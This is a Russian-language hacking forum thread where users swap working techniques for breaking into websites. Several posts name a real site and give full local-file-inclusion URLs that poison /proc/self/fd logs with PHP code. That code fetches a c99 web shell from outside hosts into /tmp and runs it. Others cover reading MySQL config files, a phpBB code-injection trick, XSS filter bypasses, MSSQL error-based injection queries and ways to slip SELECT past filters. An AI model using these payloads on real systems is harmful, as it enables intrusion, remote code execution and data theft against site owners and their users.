Ваши вопросы по уязвимостям.

Как заинклюдить через LFI конфиги phpmyadmin и/или CPanel, что бы посмотреть акки пользователей. Возможно такое?

 

Если есть (LFI) инклуд попробуй просто залить шелл и через него посмотреть скрипты/конфиги вариантов много ...
а так прочитай конфиги
/var/lib/mysql/my.cnf
/etc/mysql/my.cnf
/etc/my.cnf
или дефолтные пути ПМА

Code:

/phpm/ 
/phpmy/ 
/phpmyadmin/ 
/PMA/ 
/mysql/ 
/admin/ 
/db/ 
/dbadmin/ 
/web/phpMyAdmin/ 
/admin/pma/ 
/admin/phpmyadmin/ 
/admin/mysql/ 
/phpmyadmin2/ 
/mysqladmin/ 
/mysql-admin/ 
/phpMyAdmin-2.5.6/ 

для начало просто инклуди индекс и смотри что куда инклудится в скриптах и про /proc/self/environ не забудь прочитать

 

Изначально пытался залить шелл через /proc/self/environ и User Agent, пробовал по разному через system и copy облом, только одним способом получилось просмотреть корневую директорию <?eval(file_get_contents('http://********.ru/1.txt'));?>, а при попытке перехода или открытия файла кидает на 404 страницу, вообще я понимаю из за чего это происходит. Должно быть так index.php?e=eval(file_get_contents('http://********.ru/1.txt')); но как это сделать если я вставляю код через User Agent. Вообще у меня мало опыта может я что то упустил

 

всем привет!
случай такой,есть инклуд файлов,
http://www.aiesec-berlin.de/KDK/index.php?load=file
вот вроде как найшел error_logs причем они одинаковые..
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6

удалось впихнуть в них свой код:
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6%00<? include('http://shell.narod.ru/testing.php');?>

в ответ в логах вижу это:
http://shell.narod.ru/testing.php => `testing.php' Resolving shell.narod.ru... 213.180.199.41 Connecting to shell.narod.ru|213.180.199.41|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 23,104 (23K) [application/octet-stream] testing.php: Permission denied Cannot write to `testing.php' (Permission denied)

 

ребят есть сайтег,в общем restore базы phpbb => как всегда profile.php?mode=editprofile&cmd=phpinfo();

интересно то что несколько раз мне нормально выдал phpinfo, а вот сейчас делаю тот же запрос но идет редирект на index.php, или на какой то другой скрипт(vraag.php?url=profile_data.php)

подскажите с чем это может быть связано,что profile.php не работает..

 

я такое там нашел:
PHP Warning: include(): URL file-access is disabled in the server configuration

allow_url_fopen On On
allow_url_include Off Off

залил шел так:
1.

http://www.aiesec-berlin.de/KDK/index.php?load=StSigX15981<?php copy($_GET[aa],$_GET[bb]);include($_GET[bb]); ?>EndSigX15981
2.
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/6%00&aa=http://madnet.name/files/download/9_c99madshell.php&bb=/tmp/qwe.php

кривовато правда получилось (к шелу еще вся эта хрень грузится), но работает
думаю с этим можно дальше уже справиться

 

чето уже негрузится
видать пропалили...
http://www.aiesec-berlin.de/KDK/index.php?load=../../../../../../../../../../proc/self/fd/2

а вообще если можно то поподробнее,шелл у тебя вместе с логами грузился?

и что это ты понаписал StSigX15981???????

и в переменные ты заносил $_GET[aa] $_GET[bb] include($_GET[bb]) это что?
хотя я уже догнал
ты присвоил глобальной переменной aa сайт маднета
и проинклудил его... прикольно, но очень паливно

 

StSigX15981 - это для визуализации в логах того, что запрос нормально записался

да, шел грузился вместе с логами

паливно да, но это я на скорую руку сделал, по умному надо было бы так:
http://www.aiesec-berlin.de/KDK/index.php?load=<?php if ($_GET[cxc]=1){ob_clean();copy($_GET[axa],$_GET[bxb]);include($_GET[bxb]);}; ?>

ob_clean() или ob_end_clean() - попытка очистить все, что было выведено до начала шела - т.е. чтоб грузился только шел, без этих мегабайтов лога. проверить не успел

 

1. Если на сайте есть файл с правами 777, его можно банально прочитать через браузер, но вот можно ли как нибудь внести в него измения не имея доступа по ftp и ssh

2. Интересует такой вопрос при заливке шела откуда лучше всего его заливать? фри хост?
вообще для каких целей какую площадку лучше использовать? Например если написал на пхп парсер, снифер, брутер или ещё что нибудь подобное.

 

Если не ошибаюсь то код с которым ты восстановил БД через какое то время удаляется!!!
Лично у меня такое было пару раз!!

 

1. Никак. хоть какие права там будут!

2. Шел без разницы каким макаром заливать!!
Лучше всего когда юзер и группа ROOT, тогда можешь все файлв изменять. Хотя и тут куча разных факторов!

 

DrakonSerg Пробуй
www.........com/admin
www.........com/admin.php
www.........com/admininstrator
и так далее. все писать не буду!
А папка читается видно из-за неграмотности или пофигизма администрации сайта!

 

Привет всем, давненько у Вас не появлялся, вот вновь пришел!
Ребята есть вопрос, сегодня на одном из сайтов искал XSS при вводе <script>alert()</script> фильтр полностью обрезает что находится внутри <script></script>
Пробовал по другому <script 1></script 1> толку ноль!
BB кодами тож пробовал, разрешен код [IM*G][/IM*G] - (* нарочно поставил, что бы форум не реагировал!) если ставишь картинку то показывает ее нормально, если после картинки пробел то показывает только ссылку и тишина.
Подскажите что сделать можно!

 

WebeX
http://ha.ckers.org/xss.html

 

я в slq новичек так что не пинайте сильно

для раскрутки скуля достаточно узнать версию. Ну а для чего ещё пишут имя Database , User и OS(как узнать os).

 

за красоту

 

Database.. бывают сразу много баз, и есле выводиш таблицы то пишешь с какой базы, так и в других целях бывает нужда... про user много тебе описывать не буду но посоветую почитать в мануале mysql и т.д...

 

UP

 

привет, тут у меня вопрос по mssql inj

Code:

http://www.site.com/script.asp?id=convert(int,@@version COLLATE SQL_Latin1_General_Cp1254_CS_AS)--

Code:

Sql Version: Microsoft SQL Server 2005 - 9.00.3042.00 (X64) 
	Feb 10 2007 00:59:02 
	Copyright (c) 1988-2005 Microsoft Corporation
	Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

попробовал or 1=(select db_name())-- редирект дал.

потом без селекта

Code:

http://www.site.com/script.asp?id=convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS)--

DB Name: SSDB


запрос:

Code:

http://www.site.com/script.asp?id=convert(int,(SELECT TOP 1 cast(name COLLATE SQL_Latin1_General_Cp1254_CS_AS as nvarchar(4000))%2bchar(126) FROM SSDB..sysobjects WHERE xtype=char(85)))--

дает редир

А ЗАПРОС:

Code:

http://www.site.com/script.asp?id=+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

тоже редирект дает

тут видимо фильтруется select. Кто нит может посоветовать как обходит при таком фильтрации?
заранее спс

 

попробуй вместо SELECT

1) %53%45%4C%45%43%54
2) SELeCt
3) SEL/*blabla*/ECt
4) 'SEL'+'ECT
5) /*!SELECT*/